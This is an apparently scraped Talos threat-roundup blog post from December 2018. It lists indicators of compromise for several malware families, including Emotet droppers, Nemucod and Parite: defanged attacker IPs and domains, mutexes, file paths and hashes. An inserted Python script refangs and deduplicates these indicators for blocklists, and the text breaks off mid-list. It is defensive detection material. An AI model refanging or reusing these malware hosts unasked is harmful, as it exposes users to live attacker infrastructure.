/>1GYAJY3GRsC5twdPgmQiEeNjdn7Kx6KSPd<br />1L5SWCu4ZTLiyPyTAvfSVjhKrYNSnYgBKk<br />1LEevM4MxKSGRrTvVrvLyjiuq3vYssdTRa<br />1LT4WgSuTD71Emzc7DLeHxVoZ1RjkhNcFY<br />1LTYBLzVSLe6GDFJ5NVVxLR2j5eQ8Wy51N<br />1LjxZonruwcKXEUYySrXt7gWGJLL6Pzuyx<br />1M9r1FpWj5QbSMECeJvXoa85TDMpoQcRaT<br />1MeDDtvZB5TE5tDTcwk6GiGSK3sTAP2KLA<br />1P3cNFy3SdfZ8PvMSdgLRcb2TtaLvxfqat<br />1PqX7bMnCzpJ7L1mxuGgNyaJSkJRM8SjES<br /><br /><br /><h4 id="h.hhnvb3od61h">Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Yvbi-tyGpOA/XBPuIrU2FhI/AAAAAAAAAkM/nwzfPN62lw0xbsdQhG8EUiCyD4YIgTo-ACLcBGAs/s1600/coverage.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1194" data-original-width="1600" height="297" src="https://2.bp.blogspot.com/-Yvbi-tyGpOA/XBPuIrU2FhI/AAAAAAAAAkM/nwzfPN62lw0xbsdQhG8EUiCyD4YIgTo-ACLcBGAs/s400/coverage.png" width="400" /></a></div><br /></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/rgRN4Fc1BGk" height="1" width="1" alt=""/>2018-12-14T13:59:58.561-05:000https://blog.talosintelligence.com/2018/12/bitcoin-bomb-scare-associated-with.htmlThreat Roundup for Dec. 7 to Dec. 
14http://feedproxy.google.com/~r/feedburner/Talos/~3/A4O1YSiP_AY/threat-roundup-1207-1214.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 14 Dec 2018 09:52:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-3274858416711840530<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div></div></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 07 and Dec. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. 
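<br /><br />Because the indicators below are published in defanged form (45[.]40[.]183[.]1, enthos[.]net) and are mixed with routinely contacted infrastructure that the roundup itself marks as not indicating maliciousness, they need to be refanged, validated and de-duplicated before they go into a blocklist or a SIEM watchlist. The Python script that follows is an added example written for this edit, not Talos tooling. Its sample input is constructed in the roundup's own layout from a few values copied out of the Dkvn and Nemucod lists below, and the small benign-domain allowlist (w3.org, api.w.org, gmpg.org) is an illustrative assumption, not a list Talos publishes.

```python
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample: a few lines in the defanged layout used by the roundup.
# The IOC values are copied from the Dkvn/Nemucod lists; "not-a-hash" is a
# deliberately malformed line to show what happens to junk.
SAMPLE_IOC_TEXT = """
IP Addresses contacted by malware. Does not indicate maliciousness
45[.]40[.]183[.]1
103[.]18[.]109[.]178
Domain Names contacted by malware. Does not indicate maliciousness
enthos[.]net
www[.]w3[.]org
GOESTOM[.]COM
goestom[.]com
File Hashes
0421be0b17b64e14118e01ec412f1721bb9079630a004ff7e846f954c2355538
not-a-hash
"""

# Assumed allowlist (illustrative, not from the page): infrastructure that
# Office documents and browsers contact routinely, which the roundup flags
# as "does not indicate maliciousness".
BENIGN_DOMAINS = {"w3.org", "api.w.org", "gmpg.org"}

_SHA256 = re.compile(r"^[0-9a-f]{64}$", re.I)
_DOMAIN = re.compile(r"^(?=.{1,253}$)([a-z0-9-]{1,63}\.)+[a-z]{2,63}$", re.I)


def refang(value: str) -> str:
    """Undo the usual defanging conventions: [.] / (.) / [dot] -> . and hxxp -> http."""
    v = value.strip()
    v = v.replace("[.]", ".").replace("(.)", ".").replace("[dot]", ".")
    return re.sub(r"^hxxp", "http", v, flags=re.I)


@dataclass
class IocSet:
    ips: set = field(default_factory=set)
    domains: set = field(default_factory=set)
    sha256: set = field(default_factory=set)
    unclassified: list = field(default_factory=list)   # kept for human review


def is_benign(domain: str) -> bool:
    """True if the domain is, or is a subdomain of, an allowlisted domain."""
    return any(domain == b or domain.endswith("." + b) for b in BENIGN_DOMAINS)


def parse_iocs(text: str) -> IocSet:
    """Refang, validate and de-duplicate one roundup-style IOC block."""
    out = IocSet()
    for line in text.splitlines():
        raw = line.strip()
        if not raw or " " in raw:          # blank lines and section headers
            continue
        v = refang(raw)
        if _SHA256.match(v):
            out.sha256.add(v.lower())      # hashes are case-insensitive
            continue
        try:
            out.ips.add(str(ipaddress.ip_address(v)))   # rejects "1.2.3.999"
            continue
        except ValueError:
            pass
        if _DOMAIN.match(v):
            d = v.lower()                  # GOESTOM[.]COM and goestom[.]com collapse
            if not is_benign(d):
                out.domains.add(d)
            continue
        out.unclassified.append(raw)       # paths, mutexes, typos: never silently dropped
    return out


if __name__ == "__main__":
    result = parse_iocs(SAMPLE_IOC_TEXT)
    for name in ("ips", "domains", "sha256", "unclassified"):
        print(name, sorted(getattr(result, name)))
```

Anything that is neither a valid IP address, a well-formed hostname nor a 64-hex-digit SHA-256 lands in <code>unclassified</code> so a reviewer sees what was held back rather than losing it; the allowlist should be your organization's own, maintained deliberately, not a hard-coded guess.<br /><br />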
For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional JSON file <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5c13fb1ad467d.txt">here</a> that includes the IOCs in this post, as well as all hashes associated with each cluster; the hash lists in this blog post are capped at 25 per threat. As always, please remember that all IOCs contained in this document are indicators, and a single IOC does not by itself indicate maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Doc.Malware.Dkvn-6781497-0</b><br /> Malware<br /> This is a malicious document that drops an executable and runs PowerShell commands. It can be used as a downloader or a dropper for Emotet.<br />&nbsp;</li><li><b>Txt.Malware.Nemucod-6780827-0</b><br /> Malware<br /> Nemucod is a trojan that executes ransomware on a victim's computer.<br />&nbsp;</li><li><b>Win.Virus.Parite-6780568-0</b><br /> Virus<br /> Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.<br />&nbsp;</li><li><b>Xls.Downloader.Jums-6779285-0</b><br /> Downloader<br /> Jums is a trojan that spawns a PowerShell process, then creates and executes a malicious executable. It collects a large amount of system information and reaches out to a remote server after installation.<br />&nbsp;</li><li><b>Win.Virus.Sality-6780277-0</b><br /> Virus<br /> Sality is a file infector that establishes a peer-to-peer botnet. Although it has been prevalent for more than a decade, we continue to see new samples that need minor detection updates to keep coverage consistent. 
Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware.<br />&nbsp;</li><li><b>Doc.Malware.Powload-6775735-0</b><br /> Malware<br /> Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing the Emotet malware.<br />&nbsp;</li><li><b>PUA.Win.Trojan.Hupigon-6776762-0</b><br /> Trojan<br /> Hupigon is a trojan that installs itself as a backdoor on a victim's machine.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Doc.Malware.Dkvn-6781497-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Canon PIXMA MG2520\PrinterDriverData </li></ul><b>Mutexes</b><br /><ul><li>Local\10MU_ACB10_S-1-5-5-0-57527</li><li>Local\10MU_ACBPIDS_S-1-5-5-0-57527</li><li>Local\WinSpl64To32Mutex_e162_0_3000</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>45[.]40[.]183[.]1</li><li>66[.]198[.]240[.]4</li><li>103[.]18[.]109[.]178</li><li>192[.]169[.]140[.]162</li><li>209[.]151[.]241[.]184</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>enthos[.]net</li><li>shofar[.]com</li><li>shawktech[.]com</li><li>thecreativeshop[.]com[.]au</li><li>burlingtonadvertising[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%UserProfile%\Documents\20181212</li><li>%LocalAppData%\Temp\109.exe</li><li>%SystemDrive%\~$6889120.doc</li><li>%LocalAppData%\Temp\2vuqj0ws.zbs.ps1</li><li>%LocalAppData%\Temp\4ezh4c4j.esn.psm1</li><li>%LocalAppData%\Temp\CVR95F8.tmp</li><li>%LocalAppData%\Temp\~DF78CDE2D9B1588659.TMP</li></ul><b>File Hashes</b><br /><ul><li>0421be0b17b64e14118e01ec412f1721bb9079630a004ff7e846f954c2355538</li><li>18bf25020d301b1b22e316d2a6909a40c8dcea59fb04057d58346bdb58a7503c</li><li>24ee6e8bd38b5bef0c3db97c8cfdf03a38e442b624a1f7f731fb6e7c2989d6ea</li><li>2d50cc5a4ac493e5578038e8f892f9df5e134114ed6e9840089d9f32b8f28440</li><li>2ed82969c7fb23e18f1f9b0ab519124438129dc7f2530ee24604397b9c1250de</li><li>3e662508b29b2ef40092655a69073c220770a8306c0b17773059e07fe1a712b3</li><li>5ed274afe729b6b92cbb4446fa3f4f6130c8e20b3a903b13d7691d2006d2e72d</li><li>6d34270f0aeb0fbdb270e47866413a299a1deb54e7c4dd6b785a0ca7f2e0c73a</li><li>727afa31d97e874e3d2a3c11870a5b1b65ecda8905e3c97cbddb31a9fbfaf543</li><li>74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89</li><li>827c0012de03d21f84442e7dd0ea1d0a25f40b0e2982fab1695f935aaf471bd0</li><li>91da45beb83ea575f50ff8d9d6dcad7d9efa437b7e337006b2cc8ed2f6d4faf2</li><li>ac280877daecf65f6570233d76c249caa8eaa52cb5ba31fc3e1611d45c8d0454</li><li>aeef6e04c09d5f051f94a5c6545cf4228670954274ab97f1c85e7c78f1e6f116</li><li>af8a10416ae6e32a6250cf03d8c3ba37933903accf649e9feb4f636c17ae2b54</li><li>c26e6b57799f13d5d8353834bd721b304a15a7bbbb238995dbf98c4a26b71be3</li><li>d77fdb097fb549034a72f67236bf4c744012ff71e43f37cd89e373645fc26288</li><li>da7ac63e1a221dba1fb4d1ee743537b985fde34ad9bbc372fcc07a184ce683a7</li><li>db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b</li><li>dd57c3ea2596874a51b13fe84d3dc328365af06bd0f50eb3
28819bc970766fde</li><li>de2c3b81106ab89e0dd2c7d654b0a161e2227bbaafcd1b1860c387c7b67be69d</li><li>e2ae044f486dba0d5005295ffa9100411a6225fff6c061da69225b6c50834a69</li><li>e4269fcfda0fe8ef8872dbf51aec6dc9cbb18ad4eae281700be24f563164026d</li><li>e71d9efea3a62cc265938bac1c53aa96f8729609cabfc6df4c66d5c5e9c016fe</li><li>eb2bb764fb66c7c5509c7ce50ee3e0c61a675867f85ecdae78ad547b0ac72760</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-lkxWRVKTgfE/XBP7sAijTCI/AAAAAAAABRE/AP8XeGmALD4iYY4ei05JIsbQtu4bW5WBwCLcBGAs/s1600/db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-lkxWRVKTgfE/XBP7sAijTCI/AAAAAAAABRE/AP8XeGmALD4iYY4ei05JIsbQtu4bW5WBwCLcBGAs/s400/db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-VQ5ebfZlbo0/XBP7xWeQSFI/AAAAAAAABRI/nTCiDh5R9vw-FDOPhumnhKDCeQfotVMRgCLcBGAs/s1600/db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" 
height="532" src="https://2.bp.blogspot.com/-VQ5ebfZlbo0/XBP7xWeQSFI/AAAAAAAABRI/nTCiDh5R9vw-FDOPhumnhKDCeQfotVMRgCLcBGAs/s640/db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Pk4LV1jSUsQ/XBP74XYQfDI/AAAAAAAABRM/ti-tdfrWumwr5DoZCCbhqHU5zsl3mzgRwCLcBGAs/s1600/74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-Pk4LV1jSUsQ/XBP74XYQfDI/AAAAAAAABRM/ti-tdfrWumwr5DoZCCbhqHU5zsl3mzgRwCLcBGAs/s640/74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8V0asabKXUk/XBP8BUKblgI/AAAAAAAABRU/thWi0FMOUvo8EwxKQ_-SyYNTolXyGhC2ACLcBGAs/s1600/74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-8V0asabKXUk/XBP8BUKblgI/AAAAAAAABRU/thWi0FMOUvo8EwxKQ_-SyYNTolXyGhC2ACLcBGAs/s640/74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Txt.Malware.Nemucod-6780827-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>144[.]217[.]147[.]190</li><li>201[.]187[.]101[.]156</li><li>185[.]104[.]28[.]132</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>www[.]w3[.]org</li><li>api[.]w[.]org</li><li>gmpg[.]org</li><li>ikincielesyaevi[.]com</li><li>www[.]ikincielesyaevi[.]com</li><li>www[.]gulfshorecooling[.]com</li><li>elemaroregon[.]com</li><li>gpconstructie[.]be</li><li>cvcpdx[.]com</li><li>www[.]chaffinww[.]com</li><li>workwithcore[.]com</li><li>phoenixconstruction[.]com</li><li>www[.]laneexteriorsllc[.]com</li><li>autosorno[.]cl</li><li>cleanairtx[.]com</li><li>www[.]ohiostatestucco[.]com</li><li>www[.]teknikinc[.]com</li><li>GOESTOM[.]COM</li><li>CLARAMUSICA[.]COM</li><li>claramusica[.]com</li><li>goestom[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>\ROUTER</li><li>\DAV RPC SERVICE</li><li>\Device\Null</li><li>\Win32Pipes.00000370.00000001</li><li>\Win32Pipes.00000370.00000002</li></ul><b>File Hashes</b><br /><ul><li>029cfbcb0e44965e253979458652858b3eabfff38be5e7648c8b82f475233345</li><li>0cb706b11174c5a7fd08e70308d1ff84447d6e65a487b146846d5150931a8970</li><li>17304c0d1c57c83a58b5b1df2e6fe5b0b2a58634d1cebbd83ce8bd5533fea584</li><li>215953913e52f0e071dd8244d598a7c34367d03558599f7b9c824d916f60186a</li><li>2c93a65ec63e429b8e8a971dbaea069829763235daeb26a5f24adc69debbff71</li><li>38848aedc1194c09d6eeb88ef04ba56aee22e0f579284a63b12d896fdb0d4831</li><li>3bf5629a35700582d0abbdf8aa1c97c34c4f2fd933de6f70569d2b3103f6379e</li><li>4d85b12eddc09b1cfdfd8d580ecca6d724dd66b91d8866f707aa91cb50c7fbd7</li><li>5247f2722b8623e95f8d10cd79d0fbe3e96fe8f0527d3b9be480d2640f02b160</li><li>52cecc5d101a881b137c07143268217dacf145dab73d50e0e8da318000f5b5e0</li><li>59109d8c01b76ebe171dc28cbe37ceb393846d0ed240f54a14eb9014588c748d</li><li>5c2d33368a931651ea426f3ed037185d99c7c3bb28d5430413a2c93b4f525428</li><li>66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b</li><li>7d9fcffa70fec088cda7c4095740599a45a710ce38a66fa9e13f0dfb7bc43b3b</li><li>8afdadaa66d58e386411755871ff91858bb99016e22e67de3ce3cc63ea35c4a8</li><li>918312a6b9b634f27089520d15dc15966a25bd719627962d756f370
949adb152</li><li>af0ab34d44410fab4cfb8c24dfc0240e508de5e31a0eb567c0533344eb9c92fe</li><li>de5e00e84554eb352985d85146eb696be474c1f5b97a764052fc0575fec8ad13</li><li>e29d601569f5197e631275c5391a273058ab2aca0473dedf148177516de1e7c5</li><li>f40f059bad77bf7297b3783af078e8febf11650709294e69a9c198c711a87386</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-WDEvF5Vv_GI/XBP8PdugCGI/AAAAAAAABRc/emwyH-UWnV4HV_GIyPU_VICPxri49SniQCLcBGAs/s1600/2c93a65ec63e429b8e8a971dbaea069829763235daeb26a5f24adc69debbff71_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-WDEvF5Vv_GI/XBP8PdugCGI/AAAAAAAABRc/emwyH-UWnV4HV_GIyPU_VICPxri49SniQCLcBGAs/s400/2c93a65ec63e429b8e8a971dbaea069829763235daeb26a5f24adc69debbff71_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-DPX35Zm-zSs/XBP8UG_PUQI/AAAAAAAABRk/G2ZzeQwyxi4Iq9KmCWh9TlRtCVESvV4ngCLcBGAs/s1600/66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="639" data-original-width="962" height="424" 
src="https://1.bp.blogspot.com/-DPX35Zm-zSs/XBP8UG_PUQI/AAAAAAAABRk/G2ZzeQwyxi4Iq9KmCWh9TlRtCVESvV4ngCLcBGAs/s640/66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-DE9X1L8khxE/XBP8Yg-KjBI/AAAAAAAABRo/UsDZT2zbBkQNxqdNnqm10HYS5Cno31clACLcBGAs/s1600/17304c0d1c57c83a58b5b1df2e6fe5b0b2a58634d1cebbd83ce8bd5533fea584_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-DE9X1L8khxE/XBP8Yg-KjBI/AAAAAAAABRo/UsDZT2zbBkQNxqdNnqm10HYS5Cno31clACLcBGAs/s640/17304c0d1c57c83a58b5b1df2e6fe5b0b2a58634d1cebbd83ce8bd5533fea584_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Mc0uZVwdSOo/XBP8eFLIMnI/AAAAAAAABRs/0rxBcsxDJ4s7eA6o-eJCjLMeK7hNA-hKQCLcBGAs/s1600/66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-Mc0uZVwdSOo/XBP8eFLIMnI/AAAAAAAABRs/0rxBcsxDJ4s7eA6o-eJCjLMeK7hNA-hKQCLcBGAs/s640/66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b_malware.png" width="640" /></a></div><br /><br /><h3>Win.Virus.Parite-6780568-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>InstallLauncher_4541454E-9FFA-4246-835D-3F49EFA91F6C</li><li>\BaseNamedObjects\InstallLauncher_4541454E-9FFA-4246-835D-3F49EFA91F6C</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\ejp5C31.tmp</li></ul><b>File Hashes</b><br /><ul><li>03b06a1f568e2985a763c155c14c2a9c4b7b18471d91bf2164ad44350d4353d6</li><li>0478b98235d5c49bc7facddce8f912a4ec2b58c33b4947922927e139b9efba1f</li><li>11ec64be12c389f32640d9803deffa8f93b9457572c71f36df3fe0df4e1f6a8b</li><li>17527e946bbac0ed6c69fe1b97d4d16a8d2ea20811898ee471bf0f9e4377d3e7</li><li>250e929dc833074872defd3ca65b2ccf6cf9b32ed6f6cfca07a66767e48db6d4</li><li>2a4b55983c456e9ea14115378397e67df37d89a28818cb3f557b8afbb3e086e3</li><li>2f6a2d0728cad1403d52a3dfc6db10011fa215f6f5b8272e5c4699e1a68afaf2</li><li>318722e8243edf25c73800569cc1d78c8a6f62aa382f484116c0197d3cfc6578</li><li>3858721e1297e627247f17ebf44ff0502981481af3c04ebb6c76bafda0db2c6d</li><li>3aea0bd31f0d86f9c5a5035828dea6e42cb0646c204bb866c71528bd1f714e7f</li><li>55e263c3206ceed9776d0d0b6015cc5e7c444bed6c68a66766d34998fb744ff1</li><li>5b6e1419168ecd9ead5800273b1c63fa6420455b1ac2c85be430d5e976f4a104</li><li>69528927f100ff5c7b92e6898f33e94768953fceed5ffb71fce02dc6acb9ca56</li><li>6efd875b023b1289020e7d2acd02526d61592f4dd5e1b35e2ca04eeae162507b</li><li>78af109d92ce244c02b1530f7ae65f2c9958e34e239788caf3ee94115ad36d47</li><li>8240517c639812a704d439035b22fe685b3b905bb376776c4adcc264862675e7</li><li>8e170f44cd0e49ad850ffbd244ad755d1b0b7b91051308ed18c049a5e6068acc</li><li>8f6c73d10c4c5f1ee2758f80bbee0e2700978b34ec74b83296ec9e3a403e81db</li><li>94aad46d563c9f5a46bc1e1316d638f7e96ab4ac07b7925510644768504c9d1d</li><li>9d818507ca3222b5f1f471ae1c4338de9227e95b12ac838eed1d68550019aa22</li><li>c1b87392cafff0a07c0dedfa59da2936a371bf2e40855c9b1a1d6bf66903ef12</li><li>c56b47185d4176e620a12ba8f752a67d4e264919127970f0f8bb567f5f778511</li><li>d9cc0b9443f5ec4f84070165ddd08d3def72662df47b52795b793725547816b3</li><li>dafa195b9f7cf1b3d249ccc6e40bbc181aa54878faf3411b78ccea85e4e4f255</li><li>e77216030291a46d69d4bdf5725dc052d16e6ed7d6485b85cfcc8c4b88bc4313
</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-nTc_4Hbk2eo/XBP8tHlt_CI/AAAAAAAABR8/7sBRvm0QWyMVcwpMQe0jYeTUu-b8p2opwCLcBGAs/s1600/2a4b55983c456e9ea14115378397e67df37d89a28818cb3f557b8afbb3e086e3_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-nTc_4Hbk2eo/XBP8tHlt_CI/AAAAAAAABR8/7sBRvm0QWyMVcwpMQe0jYeTUu-b8p2opwCLcBGAs/s400/2a4b55983c456e9ea14115378397e67df37d89a28818cb3f557b8afbb3e086e3_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-UJXXPG_cSpA/XBP8y3SZcDI/AAAAAAAABSE/2W23JSt1MGcp69m0S5W2pQQaQYpOihSbwCLcBGAs/s1600/3aea0bd31f0d86f9c5a5035828dea6e42cb0646c204bb866c71528bd1f714e7f_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="636" data-original-width="962" height="422" src="https://3.bp.blogspot.com/-UJXXPG_cSpA/XBP8y3SZcDI/AAAAAAAABSE/2W23JSt1MGcp69m0S5W2pQQaQYpOihSbwCLcBGAs/s640/3aea0bd31f0d86f9c5a5035828dea6e42cb0646c204bb866c71528bd1f714e7f_tg.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://2.bp.blogspot.com/-aIJko68jxKU/XBP83whBFNI/AAAAAAAABSI/q_mA6vl1S2wTW4zUKsNRBTd3FQ5RVHmnwCLcBGAs/s1600/c1b87392cafff0a07c0dedfa59da2936a371bf2e40855c9b1a1d6bf66903ef12_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-aIJko68jxKU/XBP83whBFNI/AAAAAAAABSI/q_mA6vl1S2wTW4zUKsNRBTd3FQ5RVHmnwCLcBGAs/s640/c1b87392cafff0a07c0dedfa59da2936a371bf2e40855c9b1a1d6bf66903ef12_malware.png" width="640" /></a></div><br /><br /><h3>Xls.Downloader.Jums-6779285-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Global\552FFA80-3393-423d-8671-7BA046BB5906</li><li>Local\ZonesCacheCounterMutex</li><li>KYIMEShareCachedData.MutexObject.Administrator</li><li>KYTransactionServer.MutexObject.Administrator</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>192[.]185[.]16[.]22</li><li>192[.]254[.]237[.]11</li></ul><b>Domain Names</b> contacted by malware. 
